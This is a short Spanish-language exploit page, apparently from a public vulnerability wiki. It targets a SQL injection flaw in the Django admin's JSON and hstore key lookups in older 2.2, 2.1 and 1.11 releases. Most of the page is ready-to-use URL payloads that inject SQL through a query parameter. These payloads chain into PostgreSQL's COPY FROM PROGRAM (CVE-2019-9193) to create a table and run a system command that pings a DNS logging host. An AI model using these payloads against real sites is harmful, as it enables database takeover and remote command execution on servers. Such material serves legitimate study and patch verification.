PWNWIK.COM
,
Versión afectada
Django 2.2.x < 2.2.4 Django 2.1.x < 2.1.11 Django 1.11.x < 1.11.23
Explotar
Primero, debe iniciar sesión en el fondo del administrador y acceder a la página de administración de la colección de modelos:
http://127.0.0.1/admin/vuln/collection/
http://127.0.0.1/admin/vuln/collection/?detail__a%27
http://127.0.0.1/admin/vuln/collection/?detail__a%27)%3D%271%27%20or%201%3d1%20--
Django se usa generalmente con PostgreSQL. Puede intentar aprovechar la vulnerabilidad de ejecución de comandos de alto privilegio de PostgreSQL (CVE-2019-9193)
Visite la siguiente URL:
http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_execs(cmd_output%20text)--%20
Haga eco de la sentencia no results to fetch
ejecutada con éxito.
acceso:
http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_execs%20FROM%20PROGRAM%20%27ping%20test.dnslog.cn%20%27--%20
El comando se ejecutó con éxito.
⚠️️
test.dnslog.cn
modifique a su propio Dnslog
免费、自由、人人可编辑的漏洞库--pwnwiki.com